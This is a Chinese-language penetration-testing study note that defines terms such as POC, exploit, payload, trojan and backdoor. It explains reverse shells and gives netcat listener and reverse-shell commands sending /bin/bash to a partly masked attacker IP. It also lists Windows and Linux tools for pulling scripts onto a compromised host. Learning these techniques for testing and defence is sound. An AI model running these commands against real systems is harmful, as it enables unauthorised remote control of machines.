POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。
EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。
Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。
Shellcode:简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。
病毒vs木马 :
什么是“木马”?“木马”全称是“特洛伊木马(Trojan Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上,“特洛伊木马”指一些程序设计人员在其可从网络 上下载(Download)的应用程序或游戏中,包含了可以控制用户的计算机系统的程序,可能造成用户的系统被破坏甚至瘫痪。 木马和病毒最大的区别就是病毒以感染为目的,而木马则更注重目的性。
后门 : 大家都知道,一台计算机上有65535个端口,那么如果把计算机看作是一间屋子,那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的(提供服务),有的门是主人为了出去访问客人而开设的(访问远程服务)——理论上,剩下的其他门都该是关闭着的,但偏偏由于各种原因,很多门都是开启的。于是就有好事者进入,主人的隐私被刺探,生活被打扰,甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。
ATT&CK: 全称 "Adversarial Tactics, Techniques, and Common Knowledge",ATT&CK是由MITRE创建并维护的一个对抗战术和技术的知识库
自带防火墙出站&入站规则策略协议:
入站严格,出站宽松
正向连接与方向连接:
正向连接:主动找别人
反向连接:让别人主动找你(看以谁为基准)
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
- 往往目标机因防火墙受限,目标机器只能发送请求,不能接收请求。
利用netcat反弹shell
Netcat 是一款简单的Unix工具,使用UDP和TCP协议。 它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。 使用它你可以轻易的建立任何连接。
目前,默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布与反弹本地shell的功能参数 -e 都被阉割了,所以我们需要自己手动下载二进制安装包,安装的如下:
wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz tar -xvzf netcat-0.7.1.tar.gz ./configure make && make install make clean 安装完原生版本的 netcat 工具后,便有了netcat -e参数,我们就可以将本地bash反弹到攻击机上了。攻击机开启本地监听:
netcat -lvvp 2333目标机主动连接攻击机:
netcat 47.xxx.xxx.72 2333 -e /bin/bash # nc <攻击机IP> <攻击机监听的端口> -e /bin/bash反弹shell生成器:
反弹shell生成器 (ywhack.com)https://forum.ywhack.com/reverse-shell/
文件权限:这里讲windows,如有普通用户 < administrator < system
通过cmd命令行输入whoami,可以知道自己正在使用的用户。
比如,administrator是没有权限直接在C盘下创建文件的,需system才可以。
文件上传下载:
在渗透测试中我们一般都是在黑框框中敲命令来进行一些攻击,通常不会有图形化界面让你傻瓜式操作,这时我们就要吧自己的安全脚本下载到对方的服务器上。
- Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等
- Linux:wget curl python ruby perl java等
直接使用这个网址生成即可。
[~]#棱角 ::Edge.Forum* (ywhack.com)
https://forum.ywhack.com/bountytips.php?download
常用Linux,windows命令
借鉴文章: